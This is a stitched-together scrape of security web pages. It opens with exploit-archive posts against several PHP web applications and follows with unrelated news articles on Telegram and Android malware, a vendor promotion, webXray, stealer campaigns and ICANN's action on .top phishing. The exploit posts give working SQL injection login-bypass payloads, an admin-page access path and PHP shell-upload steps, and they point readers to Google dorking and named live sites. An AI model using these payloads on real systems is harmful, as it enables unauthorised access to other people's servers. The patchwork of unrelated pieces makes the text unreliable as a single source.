StarTask CRM version 1.9 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : StarTask CRM v1.9 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : http://p30vel.ir.domains.blog.ir/                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer&Pass : 1' or 1=1 -- -[+] https://www/127.0.0.1/rkexpress.in/dash.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

StarTask CRM 1.9 SQL Injection

UBM CMS version 1.2 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : UBM CMS v1.2 IDOR Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : https://ubminfotech.com/                                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /admin/header.php [+] https://www/127.0.0.1/orrerydrugs.com/admin/header.php [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

UBM CMS 1.2 Insecure Direct Object Reference

TAIF LMS version 5.8.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : TAIF LMS v5.8.0 shell upload Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://lmsv3.mmgulf.com/public/                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] TAIF learning script contain arbitrary file upload[+] registered user can upload .php files in profile picture section without any security[+] profile link : localhost/demo/public/profile/show/[+] profile link : /demo/public/profile/show/[+] edit profile photo and upload php files and inspect element your php direction[+] uploaded file direction :local host /demo/public/images/user_img/16067501901.php <---- random id[+] just right click the photo and use inspect element you will have your directionGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

TAIF LMS 5.8.0 Shell Upload

Vencorp version 2.1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Vencorp v 2.1.1 Auth by Pass Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://themeforest.net/item/elegant-responsive-html5-w-animated-metro-slider/5440458?ref=Venmond                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = 'or''='@gmail.com pass = 'or''='[+] https://www/127.0.0.1/venmondcom/demo/vendroid/Greetings to :=================================================jericho * Larry W. Cashdollar *LiquidWorm * Hussin-X * D4NB4R |===============================================================

Vencorp 2.1.1 SQL Injection

Webdenim AppUI version 1.0 suffers from an insecure direct object reference vulnerability.

**Webdenim AppUI 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

Webdenim AppUI version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 3418251e6b23a29fe38369d103a67d4c4c7e084f78a767a8b4660ce397493457

Download | Favorite | View

**Webdenim AppUI 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Webdenim AppUI v1.0 IDOR Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codentheme.com/item/appui-free-responsive-html-vuejs-angularjs-admin-dashboard/                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/listandrelaxcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Webdenim AppUI 1.0 Insecure Direct Object Reference

A zero-day security flaw in Telegram's mobile app for Android called EvilVideo made it possible for attackers to malicious files disguised as harmless-looking videos.
The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11.
"

A zero-day security flaw in Telegram's mobile app for Android called EvilVideo made it possible for attackers to malicious files disguised as harmless-looking videos.

The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11.

"Attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files," security researcher Lukáš Štefanko said in a report.

It's believed that the payload is concocted using Telegram's application programming interface (API), which allows for programmatic uploads of multimedia files to chats and channels. In doing so, it enables an attacker to camouflage a malicious APK file as a 30-second video.

Users who click on the video are displayed an actual warning message stating the video cannot be played and urges them to try playing it using an external player. Should they proceed with the step, they are subsequently asked to allow installation of the APK file through Telegram. The app in question is named "xHamster Premium Mod."

"By default, media files received via Telegram are set to download automatically," Štefanko said. "This means that users with the option enabled will automatically download the malicious payload once they open the conversation where it was shared."

While this option can be disabled manually, the payload can still be downloaded by tapping the download button accompanying the supposed video. It's worth noting that the attack does not work on Telegram clients for the web or the dedicated Windows app.

It's currently not clear who is behind the exploit and how widely it was used in real-world attacks. The same actor, however, advertised in January 2024 a fully undetectable Android crypter (aka cryptor) that can reportedly bypass Google Play Protect.

**Hamster Kombat's Viral Success Spawns Malicious Copycat**

The development comes as cyber criminals are capitalizing on the Telegram-based cryptocurrency game Hamster Kombat for monetary gain, with ESET discovering fake app stores promoting the app, GitHub repositories hosting Lumma Stealer for Windows under the guise of automation tools for the game, and an unofficial Telegram channel that's used to distribute an Android trojan called Ratel.

The popular game, which launched in March 2024, is estimated to have more than 250 million players, according to the game developer. Telegram CEO Pavel Durov has called Hamster Kombat the "fastest-growing digital service in the world" and that "Hamster's team will mint its token on TON, introducing the benefits of blockchain to hundreds of millions of people."

Ratel, offered via a Telegram channel named "hamster\_easy," is designed to impersonate the game ("Hamster.apk") and prompts users to grant it notification access and set itself as the default SMS application. It subsequently initiates contact with a remote server to get a phone number as response.

In the next step, the malware sends a Russian language SMS message to that phone number, likely belonging to the malware operators, to receive additional instructions over SMS.

"The threat actors then become capable of controlling the compromised device via SMS: The operator message can contain a text to be sent to a specified number, or even instruct the device to call the number," ESET said. "The malware is also able to check the victim's current banking account balance for Sberbank Russia by sending a message with the text баланс (translation: balance) to the number 900."

Ratel abuses its notification access permissions to hide notifications from no less than 200 apps based on a hard-coded list embedded within it. It's suspected that this is being done in an attempt to subscribe the victims to various premium services and prevent them from being alerted.

The Slovakian cybersecurity firm said it also spotted fake application storefronts claiming to offer Hamster Kombat for download, but actually directs users to unwanted ads, and GitHub repositories offering Hamster Kombat automation tools that deploy Lumma Stealer instead.

"The success of Hamster Kombat has also brought out cybercriminals, who have already started to deploy malware targeting the players of the game," Štefanko and Peter Strýček said. "Hamster Kombat's popularity makes it ripe for abuse, which means that it is highly likely that the game will attract more malicious actors in the future."

**BadPack Android Malware Slips Through the Cracks**

Beyond Telegram, malicious APK files targeting Android devices have also taken the form of BadPack, which refer to specially crafted package files in which the header information used in the ZIP archive format has been altered in an attempt to obstruct static analysis.

In doing so, the idea is to prevent the AndroidManifest.xml file – a crucial file that provides essential information about the mobile application – from being extracted and properly parsed, thereby allowing malicious artifacts to be installed without raising any red flags.

This technique was extensively documented by Kaspersky earlier this April in connection with an Android trojan referred to as SoumniBot that has targeted users in South Korea. Telemetry data gathered by Palo Alto Networks Unit 42 from June 2023 through June 2024 has detected nearly 9,200 BadPack samples in the wild, although none of them have been found on Google Play Store.

"These tampered headers are a key feature of BadPack, and such samples typically pose a challenge for Android reverse engineering tools," Unit 42 researcher Lee Wei Yeong said in a report published last week. "Many Android-based banking Trojans like BianLian, Cerberus and TeaBot use BadPack."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Telegram App Flaw Exploited to Spread Malware Hidden in Videos

Security questionnaires aren’t just an inconvenience — they’re a recurring problem for security and sales teams.
They bleed time from organizations, filling the schedules of professionals with monotonous, automatable work. But what if there were a way to reduce or even altogether eliminate security questionnaires? The root problem isn’t a lack of great questionnaire products — it’s the

Security questionnaires aren't just an inconvenience — they're a recurring problem for security and sales teams.

They bleed time from organizations, filling the schedules of professionals with monotonous, automatable work. But what if there were a way to reduce or even altogether eliminate security questionnaires? The root problem isn't a lack of great questionnaire products — it's the questionnaires themselves.

At SafeBase, we don't just talk about transparency — it's core to everything we do, from how we build our products to how we communicate about them. In the spirit of transparency, in this piece we're going to talk about our Trust Center platform at length:

*   Why we're believers in Trust Centers > security questionnaires
*   How a Trust Center reduces and eliminates questionnaires
*   How to demonstrate the ROI of investing in a Trust Center

Let's dive in.

**Why a trust center first approach helps**

Solving the questionnaire problem means going beyond the questionnaire with a Trust Center.

Trust Centers are built to replace questionnaires. While Trust Centers may work with and support questionnaire functions — like ours do at SafeBase — the purpose of a Trust Center is to offer a long-term solution for security questionnaires.

The labor and budget costs spent on security questionnaires alone can cost as much as a full-time employee (and in many cases more). For any enterprise or scaling organization, security assessments are a tremendous cost center and increase deal lead times for business.

Most organizations believe the solution for all of the redundancy and investment in questionnaires is making questionnaires easier. What does this mean? Creating workaround fixes for less painful questionnaires which, even with AI, present a bounty of problems:

*   Need for human intervention or oversight
*   Difficult to scale and expensive to outsource
*   Lack of trust in AI solutions with sensitive information

Trust Centers suggest an alternative to the security questionnaire process i.e. solve the real problem. Yes, it's important to have capabilities to handle security questionnaires as a "last mile" support option. However, the long-term problem reduction begins with a comprehensive Trust Center platform.

**How SafeBase reduces the security questionnaire burden**

Cut friction. If there were two words to describe how trust centers (built by SafeBase) reduce the burden of security questionnaires, these would be them. Thankfully, we have more than two words.

SafeBase takes traditionally repetitive steps in the security review process — documentation requests, access and approval of sharing said communication, responses to questionnaires — then either simplifies or automates them. No more unnecessary back and forth. No more redundancy. No more compromising security integrity under the guise of obscurity.

So how do we achieve this in our platform?

**1\. Move beyond questionnaires with Trust Centers**

Security questionnaires get the Band-Aid treatment. Organizations have traditionally pursued cures for the symptoms: _"How can we make questionnaires more manageable/less intrusive/less dreadful?"_ This status quo approach can remedy some of the short-term issues — time spent per questionnaire, management and organization, etc. — but fails to ask the question, _"Why are we having to do this in the first place?"_

Rather than accept security questionnaires as a necessary evil, SafeBase aims to make security questionnaires a pain of the past. Our Trust Center-first approach reduces inbound questionnaires by 74% or more. Some customers, like Crossbeam, experience up to a 98% reduction.

Trust centers operate as a source of truth for both sales and security teams, plus external customers and partners. Shifting the security review process from request-driven to self-serve-driven, Trust Centers help buyers understand an organization's security posture and enable quick, yet secure information sharing.

The right trust center takes the guesswork out of security reviews while providing the flexibility you need to appropriately manage access to security information/documentation. Look for functionality like:

*   Automated NDA signing
*   Magic links for credential-free/passwordless access
*   Automated access workflows like auto and bulk invites, and expiration dates with auto-alerts
*   Permission profiles for granular governance
*   Automated document watermarking
*   Change logs for visibility (and audit season!)
*   Support for SCIM and SAML protocols

Organizations that don't address the security questionnaire problem at its foundation will continue to play a short-term, highly reactive, labor-intensive game. Trust Centers are the step toward transformation, with the vision of streamlining the security review process.

**2\. Automate the questionnaires you get with AI**

Again, transparency is at the heart of how we operate. While we're (clearly) strong advocates for trust centers as table stakes for any security-minded organization, we recognize the move away from questionnaires takes time. From a company that's helped over 700 customers do so already, we know questionnaires will continue to be a pain a bit longer — organizations need solutions for both their short-term and long-term problems.

Though our Trust Center drastically reduces the need for inbound questionnaires, SafeBase offers AI Questionnaire Assistance to mitigate the impact for organizations that have to manage residual questionnaires. AI eliminates the laborious back-and-forth of questionnaires, using security-trained LLMs and SLMs to provide high-confidence responses to security domain questions, without needing heavy human intervention.

AI Questionnaire Assistance is easy for all teams to use, taking the burden off solutions engineers and security teams normally tasked with answering questionnaires. Whether it's unified questionnaire tables, confidence scoring, auto-approvals, or one-click Knowledge Base additions — SafeBase has organizations covered. This Trust Center-adjacent capability may not eliminate questionnaires, but it certainly offloads the stress of them.

**3\. Answer questionnaires in TPRMs with our Chrome extension**

If an organization needs to meet buyers where they are, i.e. in their TPRM portal, SafeBase expands questionnaire capabilities with our Chrome extension. Organizations can respond to security questionnaire answers right in the portal, eliminating the added back-and-forth in responding to TPRM questionnaires.

SafeBase boasts a growing list of supported TPRM portals, including:

*   Coupa
*   Formstack
*   Google Forms
*   Microsoft Forms
*   OneTrust
*   Panorays
*   ProcessUnity
*   ServiceNow
*   Upguard
*   Whistic
*   ZenGRC
*   ZipHQ

**Maximize the ROI of Trust Centers**

How can organizations be sure a Trust Center isn't another added security expense? We're practical — we (and our 700+ customers) can espouse the benefits of our platform all day. But if it's challenging to quantify the impact on business ROI, it's hard to justify the investment.

This is where platform-driven analytics through SafeBase come into play.

**SafeBase analytics**

SafeBase's analytics capability considers the different ways a Trust Center can impact an organization's security, trust, and growth. Both the Trust Center and AI Questionnaire Assistance provide a wealth of data to give insight into your security programs and buyer behavior.

**Buyer insights**

Know where to focus efforts by understanding where (and how) buyers interact with the Trust Center. Organizations can look at engagement metrics like views, access requests, account activity, and document interactions — or, look at more granular statistics like approved/denied/pending requests, along with access approval rate and time to approve.

**Security ROI**

Communicate the impact of security and trust programs by tying Trust Center engagement into security-driven revenue. SafeBase's dashboards showcase the ROI of security investments (via the Trust Center), so team efforts can be connected to ARR, pipeline, and deal velocity cross-functionally with sales.

**Prioritization**

Our platform helps organizations calculate projected effort vs. impact on the questionnaire side. The Revenue and Deals dashboards in Analytics highlight won and open deals, showing how security has influenced deals and where current opportunities exist to work with sales. This helps set priorities toward the strongest business outcomes first.

**Trust Centers > Security Questionnaires**

Security-minded organizations are facing a growing problem: what do we do about security questionnaires? To improve the security questionnaire process (as it exists) is to solve the immediate need of your organization, while the outcomes of investing in a Trust Center are clear:

1.  Fewer questionnaires with a comprehensive platform
2.  Easier questionnaires (for the ones you do get)
3.  Faster, more reliable security communication

While we're adamant about a future with no security questionnaires, we're empathetic to the current needs of security-minded organizations. Our Trust Center platform improves the security review process, whether it's solving current needs (security questionnaires) or future ones (building proactive security postures).

Organizations can finally move beyond an outdated, Band-Aid fix for security and trust communication by reducing the prevalence of, latency in, and dependence on security questionnaires with SafeBase's Trust Center platform.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

How a Trust Center Solves Your Security Questionnaire Problem

A former Google engineer has built a search engine, webXray, that aims to find illicit online data collection and tracking—with the goal of becoming “the Henry Ford of tech lawsuits.”

This is, incidentally, how he plans to fund the operation—the basic version of webXray will be available to all, but Libert will offer a specialized tier for litigators, regulators, and businesses looking to keep their digital presences compliant with the law. He will also offer consulting services and serve as an expert witness in lawsuits.

I gave the keys to the site to digital rights activist Cory Doctorow, who took a quick look under the hood, and gave the idea a thumbs up. “I think the way to go here is class action,” Doctorow says, noting that this could lead to a trove of class action lawsuits against big tech companies. “So long as this is just exposing the API calls that produces evidence that Google is getting data that it doesn’t have lawful consent to receive or hold, this is the right move. I think it’s really a smoking gun,” he says.

Libert, for his part, concurs. “Yeah, I wanna be the Henry Ford of tech lawsuits—turn this into a factory assembly line.”

He’s already started. Three months after leaving Google, Libert served as an expert witness in a trial, testifying that websites were allegedly leaking data in violation of the law—against Google. His former employer tried to have him disqualified, arguing, somewhat ironically, that he knew too much. On Google’s policy and internal standards team, the company’s court records say, “Dr. Libert became the go-to person for all things related to cookies.” (On Monday, a judge dismissed that lawsuit, pending appeal.)

“When I did that first lawsuit, and used webXray for that, they lost it,” Libert says of Google’s reaction. “When you look at those legal filings, there’s one thing that’s driving that—fear. They’re afraid of this data being available, because they know it affects the bottom line. And it scares them.”

“One of the tragedies of Google is they used to lead by example in a positive way, and I think especially in the past three to five years, they’re not leading by positive example, they’re systematically leading by negative example,” Libert says. “And I think that’s burning down the web—the most powerful company doing things like recommending you put glue on your pizza. It’s not just that _a website_ is doing that, it’s that _the_ website, _the_ advertising platform is doing that, and that was part of my frustration.”

Google of course disagrees with this characterization of its tools and operations. “We design and build our products with strong security and privacy protections, including easy-to-use controls for managing and deleting data,” Bryant, the company spokesperson, says. “When it comes to advertising, Google was the first company to build a tool that lets people see and adjust their ads settings and even opt out of personalized ads entirely.”

Despite Libert’s gloomy view of the current state of online privacy, he is actually an optimist. He believes webXray will help speed up a shift to a better, more private, more secure web—the path to which Google and the other tech giants are currently blocking. And it’s no coincidence, perhaps, that there’s been an exodus from Google’s privacy teams in the last few months: The announcement of Keith Enright, Google’s privacy chief, exiting the company came in June, and the position “will not be replaced.” Libert says his colleagues are getting fired en masse. To Libert, it seems that Google is deprioritizing privacy at the very moment when users are calling for stronger policies.

“The problem we had 10 to 15 years ago is that there weren’t any laws. Now lots of countries have passed laws—the vast majority of people on the planet are protected by data privacy laws, but enforcement hasn’t caught up,” he says. “It’s going to catch up. I think we can speed it up.” Because people _want_ privacy; it’s that simple. It’s why he imagines law offices, government offices, and businesses turning to his new search engine to help root out the scourge of privacy violations across the web.

It’s why, perhaps, webXray’s tagline is simple and idealistic: “Privacy is inevitable.”

I guess we’ll find out.

_Updated 7/24/2024, 1:50 pm: Clarified the launch date of webXray, which was officially released publicly on Wednesday._

This Machine Exposes Privacy Violations

A now-patched security flaw in the Microsoft Defender SmartScreen has been exploited as part of a new campaign designed to deliver information stealers such as ACR Stealer, Lumma, and Meduza.
Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1).
The high-severity

Malvertising / Threat Intelligence

A now-patched security flaw in the Microsoft Defender SmartScreen has been exploited as part of a new campaign designed to deliver information stealers such as ACR Stealer, Lumma, and Meduza.

Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1).

The high-severity vulnerability allows an attacker to sidestep SmartScreen protection and drop malicious payloads. Microsoft addressed this issue as part of its monthly security updates released in February 2024.

"Initially, attackers lure victims into clicking a crafted link to a URL file designed to download an LNK file," security researcher Cara Lin said. "The LNK file then downloads an executable file containing an \[HTML Application\] script."

The HTA file serves as a conduit to decode and decrypt PowerShell code responsible for fetching a decoy PDF file and a shellcode injector that, in turn, either leads to the deployment of Meduza Stealer or Hijack Loader, which subsequently launches ACR Stealer or Lumma.

ACR Stealer, assessed to be an evolved version of the GrMsk Stealer, was advertised in late March 2024 by a threat actor named SheldIO on the Russian-language underground forum RAMP.

"This ACR stealer hides its \[command-and-control\] with a dead drop resolver (DDR) technique on the Steam community website," Lin said, calling out its ability to siphon information from web browsers, crypto wallets, messaging apps, FTP clients, email clients, VPN services, and password managers.

It's worth noting that recent Lumma Stealer attacks have also been observed utilizing the same technique, making it easier for the adversaries to change the C2 domains at any time and render the infrastructure more resilient, according to the AhnLab Security Intelligence Center (ASEC).

The disclosure comes as CrowdStrike has revealed that threat actors are leveraging last week's outage to distribute a previously undocumented information stealer called Daolpu, making it the latest example of the ongoing fallout stemming from the faulty update that has crippled millions of Windows devices.

The attack involves the use of a macro-laced Microsoft Word document that masquerades as a Microsoft recovery manual listing legitimate instructions issued by the Windows maker to resolve the issue, leveraging it as a decoy to activate the infection process.

The DOCM file, when opened, runs the macro to retrieve a second-stage DLL file from a remote that's decoded to launch Daolpu, a stealer malware equipped to harvest credentials and cookies from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based browsers.

It also follows the emergence of new stealer malware families such as Braodo and DeerStealer, even as cyber criminals are exploiting malvertising techniques promoting legitimate software such as Microsoft Teams to deploy Atomic Stealer.

"As cyber criminals ramp up their distribution campaigns, it becomes more dangerous to download applications via search engines," Malwarebytes researcher Jérôme Segura said. "Users have to navigate between malvertising (sponsored results) and SEO poisoning (compromised websites)."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers

The Chinese company in charge of handing out domain names ending in “.top” has been given until mid-August 2024 to show that it has put in place systems for managing phishing reports and suspending abusive domains, or else forfeit its license to sell domains. The warning comes amid the release of new findings that .top was the most common suffix in phishing websites over the past year, second only to domains ending in “.com.”

The Chinese company in charge of handing out domain names ending in “**.top**” has been given until mid-August 2024 to show that it has put in place systems for managing phishing reports and suspending abusive domains, or else forfeit its license to sell domains. The warning comes amid the release of new findings that .top was the most common suffix in phishing websites over the past year, second only to domains ending in “.com.”

Image: Shutterstock.

On July 16, the **Internet Corporation for Assigned Names and Numbers** (ICANN) sent a letter to the owners of the .top domain registry. ICANN has filed hundreds of enforcement actions against domain registrars over the years, but in this case ICANN singled out a domain registry responsible for maintaining an entire top-level domain (TLD).

Among other reasons, the missive chided the registry for failing to respond to reports about phishing attacks involving .top domains.

“Based on the information and records gathered through several weeks, it was determined that .TOP Registry does not have a process in place to promptly, comprehensively, and reasonably investigate and act on reports of DNS Abuse,” the ICANN letter reads (PDF).

ICANN’s warning redacted the name of the recipient, but records show the .top registry is operated by a Chinese entity called **Jiangsu Bangning Science & Technology Co. Ltd**. Representatives for the company have not responded to requests for comment.

Domains ending in .top were represented prominently in a new phishing report released today by the **Interisle Consulting Group**, which sources phishing data from several places, including the **Anti-Phishing Working Group** (APWG), **OpenPhish**, **PhishTank**, and **Spamhaus**.

Interisle’s newest study examined nearly two million phishing attacks in the last year, and found that phishing sites accounted for more than four percent of all new .top domains between May 2023 and April 2024. Interisle said .top has roughly 2.76 million domains in its stable, and that more than 117,000 of those were phishing sites in the past year.

Source: Interisle Consulting Group.

ICANN said its review was based on information collected and studied about .top domains over the past few weeks. But the fact that high volumes of phishing sites are being registered through Jiangsu Bangning Science & Technology Co Ltd. is hardly a new trend.

For example, more than 10 years ago the same Chinese registrar was the fourth most common source of phishing websites, as tracked by the APWG. Bear in mind that the APWG report excerpted below was published _more than a year before Jiangsu Bangning received ICANN approval to introduce and administer the new .top registry._

Source: APWG phishing report from 2013, two years before .top came into being.

A fascinating new wrinkle in the phishing landscape is the growth in scam pages hosted via the InterPlanetary File System (IPFS), a decentralized data storage and delivery network that is based on peer-to-peer networking. According to Interisle, the use of IPFS to host and launch phishing attacks — which can make phishing sites more difficult to take down — increased a staggering 1,300 percent, to roughly 19,000 phishing sites reported in the last year.

Last year’s report from Interisle found that domain names ending in “.us” — the top-level domain for the United States — were among the most prevalent in phishing scams. While .us domains are not even on the Top 20 list of this year’s study, “.com” maintained its perennial #1 spot as the largest source of phishing domains overall.

A year ago, the phishiest domain registrar by far was **Freenom**, a now-defunct registrar that handed out free domains in several country-code TLDs, including .tk, .ml, .ga and .cf. Freenom went out of business after being sued by Meta, which alleged Freenom ignored abuse complaints while monetizing traffic to abusive domains.

Following Freenom’s demise, phishers quickly migrated to other new low-cost TLDs and to services that allow anonymous, free domain registrations — particularly subdomain services. For example, Interisle found phishing attacks involving websites created on Google’s **blogspot.com** skyrocketed last year more than 230 percent. Other subdomain services that saw a substantial growth in domains registered by phishers include **weebly.com**, **github.io**, **wix.com**, and **ChangeIP**, the report notes.

Source: Interisle Consulting.

Interisle Consulting partner **Dave Piscitello** said ICANN could easily send similar warning letters to at least a half-dozen other top-level domain registries, noting that spammers and phishers tend to cycle through the same TLDs periodically — including **.xyz**, **.info**, **.support** and **.lol**, all of which saw considerably more business from phishers after Freenom’s implosion.

Piscitello said domain registrars and registries could significantly reduce the number of phishing sites registered through their services just by flagging customers who try to register huge volumes of domains at once. Their study found that at least 27% of the domains used for phishing were registered in bulk — i.e. the same registrant paid for hundreds or thousands of domains in quick succession.

The report includes a case study in which a phisher this year registered 17,562 domains over the course of an eight-hour period — roughly 38 domains per minute — using .lol domains that were all composed of random letters.

ICANN tries to resolve contract disputes privately with the registry and registrar community, and experts say the nonprofit organization usually only publishes enforcement letters when the recipient is ignoring its private notices. Indeed, ICANN’s letter notes Jiangsu Bangning didn’t even open its emailed notifications. It also cited the registry for falling behind in its ICANN membership fees.

With that in mind, a review of ICANN’s public enforcement activity suggests two trends: One is that there have been far fewer public compliance and enforcement actions in recent years — even as the number of new TLDs has expanded dramatically.

The second is that in a majority of cases, the failure of a registry or registrar to pay its annual ICANN membership fees was cited as a reason for a warning letter. A review of nearly two dozen enforcement letters ICANN has sent to domain registrars since 2022 shows that failure to pay dues was cited as a reason (or _the_ reason) for the violation at least 75 percent of the time.

Piscitello, a former ICANN board member, said nearly all breach notices sent out while he was at ICANN were because the registrar owed money.

“I think the rest is just lipstick to suggest that ICANN’s on top of DNS Abuse,” Piscitello said.

KrebsOnSecurity has sought comment from ICANN and will update this story if they respond.

ICANN said most of its investigations are resolved and closed through the initial informal resolution stage, and that hundreds of enforcement cases are initiated during this stage with the contracted parties who are required to demonstrate compliance, become compliant, and/or present and implement remediation plans to prevent the recurrence of those enforcement issues.

“It is important to take into account that, prior to issuing any notice of breach to a registrar or registry operator, ICANN Compliance conducts an overall contractual compliance ‘health check’ of the relevant contracted party,” ICANN said in a written response to questions. “During this check, ICANN Compliance proactively reviews the contracted party’s compliance with obligations across the agreements and policies. Any additional contractual violation found during these checks is added to the Notice of Breach. It is not uncommon for parties who failed to comply with contractual obligations (whether they are related to DNS Abuse, RDDS, or others) to also be in arrears with ICANN fees.”

**Update, 11:49 p.m. ET:** Added statement from ICANN.

Tag

#google